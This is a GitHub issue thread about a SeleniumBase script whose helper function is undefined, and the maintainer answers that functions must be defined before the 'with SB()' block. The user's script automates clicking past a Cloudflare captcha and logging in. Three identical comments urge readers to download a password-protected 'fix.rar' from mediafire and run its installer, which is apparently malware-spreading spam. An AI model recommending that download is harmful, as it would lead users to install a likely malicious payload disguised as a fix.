### ISSUE TITLE
Using Other Functions Inside SeleniumBase as SB

### ISSUE THREAD

**Issue by boimouseorange** [seleniumbase/SeleniumBase#3056]
Hi, I'm curious about using functions inside a seleniumbase script that don't use selenium. Meaning, that I want to be able to use the requests library with seleniumbase to get status codes but it doesn't look like that's an option. Secondly, I would also like to find a way to call on other functions in my script. Simple if-then functions that respond with a different function based on the result. Every time I've tried this, it has come up with my function not being defined.

For example (this tells me that second_function is not defined):

```
from seleniumbase import SB
from time import sleep
from selenium.common.exceptions import NoSuchElementException
from selenium import webdriver
from seleniumbase import BaseCase
BaseCase.main(__name__, __file__)


url = "placeholder"


username = 'username'
password = 'password'

with SB(uc=True, test=True) as sb:
    sb.uc_open_with_reconnect(url, 4)
    sb.uc_gui_click_captcha()
    print("Cloudflare Security Bypassed")
    sb.type("/html/body/section/div/div[2]/div[2]/form/div[1]/input", username)
    sb.type("/html/body/section/div/div[2]/div[2]/form/div[2]/input", password)
    sb.js_click("/html/body/section/div/div[2]/div[2]/form/div[3]/button")
    print("Logged In")

    sleep(5)

    try:
        sb.js_click("//*[@id=\"info-modal\"]/div/div/div[1]/button/span")
        sleep(3)
        print("Important Notice Was On Screen")
        second_function()
    except Exception:
            print("Important Notice Was Not On Screen")
            second_function()

    def second_function():
        print("this is the second function")
```

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mdmintz** [comment]
You can use any Python library that you want with SeleniumBase.

Define your functions before you call your `with SB()` block.

The `BaseCase.main(__name__, __file__)` line is only for `pytest` syntax formats. See [SeleniumBase/help_docs/syntax_formats.md](https://github.com/seleniumbase/SeleniumBase/blob/master/help_docs/syntax_formats.md).
